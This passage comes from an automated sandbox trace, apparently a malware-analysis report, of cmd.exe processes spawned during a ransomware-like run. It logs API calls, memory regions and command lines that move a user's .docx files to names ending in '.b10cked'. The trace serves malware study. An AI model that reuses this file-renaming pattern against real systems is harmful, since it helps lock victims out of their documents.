lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.363] GetConsoleOutputCP () returned 0x1b5 [0136.370] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.370] GetUserDefaultLCID () returned 0x409 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0136.380] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x23, lpLCData=0x24fbd8, cchData=128 | out: lpLCData="0") returned 2 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fbd8, cchData=128 | out: lpLCData="0") returned 2 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fbd8, cchData=128 | out: lpLCData="1") returned 2 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0136.381] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0136.381] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.382] GetConsoleTitleW (in: lpConsoleTitle=0x3408e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.408] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.408] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0136.408] GetProcAddress 
(hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0136.408] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0136.409] _wcsicmp (_String1="move", _String2=")") returned 68 [0136.409] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0136.409] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0136.409] _wcsicmp (_String1="IF", _String2="move") returned -4 [0136.409] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0136.409] _wcsicmp (_String1="REM", _String2="move") returned 5 [0136.409] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0136.412] GetConsoleTitleW (in: lpConsoleTitle=0x24f8d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.446] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0136.446] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0136.446] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0136.446] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0136.446] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0136.446] _wcsicmp (_String1="move", _String2="CD") returned 10 [0136.446] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0136.446] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0136.446] _wcsicmp (_String1="move", _String2="REN") returned -5 [0136.446] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0136.446] _wcsicmp (_String1="move", _String2="SET") returned -6 [0136.446] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0136.446] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0136.446] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0136.446] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0136.446] _wcsicmp (_String1="move", _String2="MD") returned 11 [0136.446] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0136.446] _wcsicmp (_String1="move", _String2="RD") returned -5 [0136.446] _wcsicmp 
(_String1="move", _String2="RMDIR") returned -5 [0136.446] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0136.446] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0136.446] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0136.446] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0136.446] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0136.446] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0136.446] _wcsicmp (_String1="move", _String2="VER") returned -9 [0136.446] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0136.446] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0136.446] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0136.446] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0136.446] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0136.446] _wcsicmp (_String1="move", _String2="START") returned -6 [0136.446] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0136.446] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0136.446] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0136.448] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.448] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.448] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f68c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f684, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f684*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", 
_MaxCount=0x7) returned 3 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 
[0136.449] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0136.449] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0136.450] _wcsicmp (_String1="M9MMOP~1.DOC", _String2=".") returned 63 [0136.450] _wcsicmp (_String1="M9MMOP~1.DOC", _String2="..") returned 63 [0136.450] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\m9mmop~1.doc")) returned 0x20 [0136.450] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x351e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.450] SetErrorMode (uMode=0x0) returned 0x0 [0136.450] SetErrorMode (uMode=0x1) returned 0x0 [0136.450] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC", nBufferLength=0x104, lpBuffer=0x24f014, lpFilePart=0x24effc | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC", lpFilePart=0x24effc*="M9MMOP~1.DOC") returned 0x26 [0136.450] SetErrorMode (uMode=0x0) returned 0x1 [0136.450] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0136.450] _wcsicmp (_String1="M9MMOP~1.DOC", _String2=".") returned 63 [0136.450] _wcsicmp (_String1="M9MMOP~1.DOC", _String2="..") returned 63 [0136.450] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\m9mmop~1.doc")) returned 0x20 [0136.450] SetErrorMode (uMode=0x0) returned 0x0 [0136.450] SetErrorMode (uMode=0x1) 
returned 0x0 [0136.451] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC", nBufferLength=0x104, lpBuffer=0x24f490, lpFilePart=0x24f228 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC", lpFilePart=0x24f228*="M9MMOP~1.DOC") returned 0x26 [0136.451] SetErrorMode (uMode=0x0) returned 0x1 [0136.451] SetErrorMode (uMode=0x0) returned 0x0 [0136.451] SetErrorMode (uMode=0x1) returned 0x0 [0136.451] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked", nBufferLength=0x104, lpBuffer=0x24f698, lpFilePart=0x24f228 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked", lpFilePart=0x24f228*="M9MmOpgceUJDVTGEEh.docx.b10cked") returned 0x39 [0136.451] SetErrorMode (uMode=0x0) returned 0x1 [0136.451] SetLastError (dwErrCode=0x0) [0136.451] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\m9mmopgceujdvtgeeh.docx.b10cked")) returned 0xffffffff [0136.451] GetLastError () returned 0x2 [0136.451] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x24eba4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24eba4) returned 0x340e70 [0136.451] FindNextFileW (in: hFindFile=0x340e70, lpFindFileData=0x24eba4 | out: lpFindFileData=0x24eba4) returned 0 [0136.452] GetLastError () returned 0x12 [0136.452] FindClose (in: hFindFile=0x340e70 | out: hFindFile=0x340e70) returned 1 [0136.452] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x351be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x351be0) returned 0x340e70 [0136.453] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked", nBufferLength=0x104, lpBuffer=0x24ee3c, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked", lpFilePart=0x0) returned 0x39 [0136.453] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx", nBufferLength=0x104, lpBuffer=0x24ee3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx", lpFilePart=0x0) returned 0x31 [0136.453] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\m9mmopgceujdvtgeeh.docx")) returned 0x20 [0136.453] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\m9mmopgceujdvtgeeh.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\m9mmopgceujdvtgeeh.docx.b10cked"), dwFlags=0x3) returned 1 [0136.453] FindClose (in: hFindFile=0x340e70 | out: hFindFile=0x340e70) returned 1 [0136.453] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24edf0 | out: _Buffer=" 1") returned 9 [0136.453] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.453] GetFileType (hFile=0x7) returned 0x2 [0136.652] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.652] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24ed7c | out: lpMode=0x24ed7c) returned 1 [0136.652] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.652] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24edb0 | out: lpConsoleScreenBufferInfo=0x24edb0) returned 1 [0136.653] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0136.653] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x24edf0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a 
[0136.653] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24edd4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x24edd4*=0x1a) returned 1 [0136.653] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.653] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.654] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.654] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.654] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.654] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.654] SetConsoleInputExeNameW () returned 0x1 [0136.654] GetConsoleOutputCP () returned 0x1b5 [0136.654] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.654] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.654] exit (_Code=0) Process: id = "140" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0xbe8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13694 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" 
Region: id = 13695 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13696 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13697 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 13698 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13699 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13700 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13701 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13702 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 13703 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14031 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14032 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14033 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 
region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14034 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 14035 start_va = 0x600000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 14036 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 14037 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14038 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14039 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14040 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14041 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14042 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: 
"c:\\windows\\system32\\usp10.dll") Region: id = 14043 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14044 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14117 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 14118 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14119 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14120 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 14121 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 14122 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 14123 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 14124 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 14125 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14126 start_va = 0x1210000 end_va = 0x1372fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Thread: id = 197 os_tid = 0xc04 [0136.292] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa14 | out: lpSystemTimeAsFileTime=0x26fa14*(dwLowDateTime=0x8b2c83a0, dwHighDateTime=0x1d440a9)) [0136.292] GetCurrentProcessId () returned 0xbe8 [0136.292] GetCurrentThreadId () returned 0xc04 [0136.292] GetTickCount () returned 0x2b154 [0136.292] QueryPerformanceCounter (in: lpPerformanceCount=0x26fa0c | out: lpPerformanceCount=0x26fa0c*=19308111448) returned 1 [0136.293] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0136.293] __set_app_type (_Type=0x1) [0136.293] __p__fmode () returned 0x76b331f4 [0136.293] __p__commode () returned 0x76b331fc [0136.293] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0136.293] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0136.293] GetCurrentThreadId () returned 0xc04 [0136.293] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc04) returned 0x38 [0136.293] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.293] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0136.293] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.323] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.323] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f9a4 | out: phkResult=0x26f9a4*=0x0) returned 0x2 [0136.323] VirtualQuery (in: lpAddress=0x26f9db, lpBuffer=0x26f974, dwLength=0x1c | out: lpBuffer=0x26f974*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, 
Type=0x20000)) returned 0x1c [0136.323] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f974, dwLength=0x1c | out: lpBuffer=0x26f974*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.323] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f974, dwLength=0x1c | out: lpBuffer=0x26f974*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.323] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f974, dwLength=0x1c | out: lpBuffer=0x26f974*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.323] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f974, dwLength=0x1c | out: lpBuffer=0x26f974*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0136.323] GetConsoleOutputCP () returned 0x1b5 [0136.326] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.326] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0136.326] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.326] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0136.328] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.328] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.329] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.331] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.331] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.332] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.332] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0136.348] 
